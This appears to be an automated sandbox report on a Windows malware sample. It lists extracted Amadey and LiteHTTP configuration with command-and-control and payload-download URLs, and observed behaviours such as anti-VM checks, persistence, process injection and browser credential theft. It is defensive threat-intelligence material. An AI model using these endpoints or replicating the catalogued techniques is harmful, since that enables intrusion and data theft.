Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 19:59
Static task
static1
Behavioral task
behavioral1
Sample
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Resource
win10v2004-20250217-en
General
-
Target
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
-
Size
1.8MB
-
MD5
6b38db8d1cadb7a58f0bd9f9d281646a
-
SHA1
f56be70672c257dc68cfb0b9a0781569070b122b
-
SHA256
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1
-
SHA512
6ac8fbbd65da962674112f1ec89fe62c9ceb470e9c6fb7fdd9f1654d8f501b71bc6409fd08b43d8f38d2229ce1964bcbc14ae7ccbad0613a51943d9631fe20ca
-
SSDEEP
49152:DerWqI+PXK2ZRVtlhQXXPjeDXDrC7bbnh:DeCqXa2ZRVJo2X3C7bbh
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Litehttp family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5060 created 3452 5060 AhFKwnS.exe 56 PID 5396 created 3452 5396 AhFKwnS.exe 56 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8b03683f6c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 83f7623ac7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7f7ea3cb08.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE -
Blocklisted process makes network request 2 IoCs
flow pid Process 30 3772 powershell.exe 36 2676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 2676 powershell.exe 3772 powershell.exe 2992 powershell.exe 4260 powershell.exe 3716 powershell.exe 5220 powershell.exe 4032 powershell.exe 5744 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1372 bitsadmin.exe -
Downloads MZ/PE file 15 IoCs
flow pid Process 28 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 41 5056 rapes.exe 211 5056 rapes.exe 211 5056 rapes.exe 30 3772 powershell.exe 36 2676 powershell.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4164 chrome.exe 5644 chrome.exe 3572 chrome.exe 5956 chrome.exe 5836 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x0007000000023d9d-3076.dat net_reactor behavioral2/memory/5024-3086-0x0000000000F60000-0x0000000000FC0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8b03683f6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8b03683f6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 83f7623ac7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 83f7623ac7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7f7ea3cb08.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7f7ea3cb08.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs AhFKwnS.exe -
Executes dropped EXE 31 IoCs
pid Process 5056 rapes.exe 4492 72beb2516b.exe 3116 rapes.exe 3024 TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE 5060 AhFKwnS.exe 5396 AhFKwnS.exe 5412 483d2fa8a0d53818306efeb32d3.exe 1956 v6Oqdnc.exe 5772 OEHBOHk.exe 1212 MCxU5Fj.exe 6112 MCxU5Fj.exe 3336 ckonftponqgz.exe 5424 Y87Oyyz.exe 5404 Y87Oyyz.exe 4408 SplashWin.exe 972 SplashWin.exe 1648 ce4pMzk.exe 5024 mAtJWNv.exe 5812 mAtJWNv.exe 5016 rapes.exe 2380 SvhQA35.exe 5896 chromium.exe 5288 FvbuInU.exe 5752 Ps7WqSx.exe 1368 zY9sqWs.exe 6028 83f7623ac7.exe 5100 rapes.exe 5584 7f7ea3cb08.exe 5960 82b5673820.exe 4744 82b5673820.exe 4220 8b03683f6c.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 8b03683f6c.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 83f7623ac7.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 7f7ea3cb08.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine v6Oqdnc.exe -
Loads dropped DLL 54 IoCs
pid Process 5404 Y87Oyyz.exe 4408 SplashWin.exe 4408 SplashWin.exe 4408 SplashWin.exe 972 SplashWin.exe 972 SplashWin.exe 972 SplashWin.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5896 chromium.exe 5632 Syncsign_v1.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105760121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\7xmbMLPu\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\72beb2516b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105750101\\72beb2516b.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4416 powercfg.exe 4216 powercfg.exe 4324 powercfg.exe 5324 powercfg.exe 4340 powercfg.exe 5908 powercfg.exe 432 powercfg.exe 5844 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000600000001e6c0-26.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 1532 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 5056 rapes.exe 3116 rapes.exe 3024 TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE 5412 483d2fa8a0d53818306efeb32d3.exe 1956 v6Oqdnc.exe 5016 rapes.exe 5288 FvbuInU.exe 6028 83f7623ac7.exe 5100 rapes.exe 5584 7f7ea3cb08.exe 4220 8b03683f6c.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 5060 set thread context of 3712 5060 AhFKwnS.exe 123 PID 5396 set thread context of 5840 5396 AhFKwnS.exe 124 PID 1212 set thread context of 6112 1212 MCxU5Fj.exe 130 PID 3336 set thread context of 2936 3336 ckonftponqgz.exe 167 PID 3336 set thread context of 5544 3336 ckonftponqgz.exe 173 PID 972 set thread context of 1852 972 SplashWin.exe 174 PID 5024 set thread context of 5812 5024 mAtJWNv.exe 179 PID 5960 set thread context of 4744 5960 82b5673820.exe 220 PID 5584 set thread context of 1964 5584 7f7ea3cb08.exe 223 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2272 sc.exe 5872 sc.exe 5752 sc.exe 2588 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 5084 1212 WerFault.exe 129 3228 5024 WerFault.exe 178 3548 5960 WerFault.exe 219 -
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8b03683f6c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7f7ea3cb08.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 83f7623ac7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 82b5673820.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72beb2516b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 82b5673820.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2384 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856784847148538" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000_Classes\Local Settings rapes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4976 schtasks.exe 1848 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1532 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 1532 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 5056 rapes.exe 5056 rapes.exe 3772 powershell.exe 3772 powershell.exe 3772 powershell.exe 3116 rapes.exe 3116 rapes.exe 3024 TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE 3024 TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe 4260 powershell.exe 4260 powershell.exe 4260 powershell.exe 3716 powershell.exe 3716 powershell.exe 3716 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 5060 AhFKwnS.exe 5060 AhFKwnS.exe 5060 AhFKwnS.exe 5060 AhFKwnS.exe 5412 483d2fa8a0d53818306efeb32d3.exe 5412 483d2fa8a0d53818306efeb32d3.exe 5396 AhFKwnS.exe 5396 AhFKwnS.exe 5396 AhFKwnS.exe 5396 AhFKwnS.exe 3712 InstallUtil.exe 3712 InstallUtil.exe 3712 InstallUtil.exe 3712 InstallUtil.exe 5840 InstallUtil.exe 5840 InstallUtil.exe 5840 InstallUtil.exe 5840 InstallUtil.exe 1956 v6Oqdnc.exe 1956 v6Oqdnc.exe 1956 v6Oqdnc.exe 1956 v6Oqdnc.exe 1956 v6Oqdnc.exe 1956 v6Oqdnc.exe 6112 MCxU5Fj.exe 6112 MCxU5Fj.exe 6112 MCxU5Fj.exe 6112 MCxU5Fj.exe 5772 OEHBOHk.exe 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe 5772 OEHBOHk.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 972 SplashWin.exe 1852 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe -
